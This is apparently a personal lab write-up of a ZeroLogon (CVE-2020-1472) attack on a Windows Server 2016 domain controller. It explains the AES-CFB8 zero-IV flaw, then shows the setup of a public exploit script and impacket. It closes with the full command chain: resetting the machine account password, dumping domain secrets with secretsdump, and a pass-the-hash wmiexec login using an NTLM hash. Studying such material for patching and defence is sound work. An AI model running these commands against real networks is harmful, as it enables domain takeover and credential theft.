ZeroLogon Exploit

Introduction
​CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020.

This vulnerability was discovered by secure security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8)  that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC.

ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram is the authentication handshake process of  MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.  
Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number,  but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256.  It can easy to pass the step 4 validation.

The attack details can be referenced to the Whitepaper by Tom Tervoor
​
Exploitation Demo
Many PoC exploits have been released (1, 2, 3, 4, 5, ... etc)
Target Environment 
Host Name:               FKCLAI-WIN2016
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
Domain:                      FKCLAI.local
Logon Server:             \\FKCLAI-WIN2016

​
Tools Setup
Using the RiskSense's ZeroLogon exploitation script with the latest updated of the impacket on this demo.
[email protected]:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
[email protected]:~/Documents/ctf/expoit# 
Remove all impacket scripts
[email protected]:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
  erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
  erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
  erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
  erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
  ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
  gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
  guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
  keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
  libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
  libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
  libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
​
get the latest impacket from the  https://github.com/SecureAuthCorp/impacket.git
[email protected]:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.
​
[email protected]:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file
​
Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file
​
Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin
​
Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
[email protected]:~/Documents/ctf/tools/win/impacket# 
​
Start Exploit
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
mimikatz Coding​
​

My Work

Next - Exploit/CVE PoC

Remote Retrieved Chrome saved Encrypted Password

Last modified 1yr ago

Copy link

Outline

Introduction

Exploitation Demo

Target Environment

Tools Setup

Start Exploit

mimikatz Coding

Introduction

Exploitation Demo

Target Environment

Tools Setup

Start Exploit

mimikatz Coding​

mimikatz Coding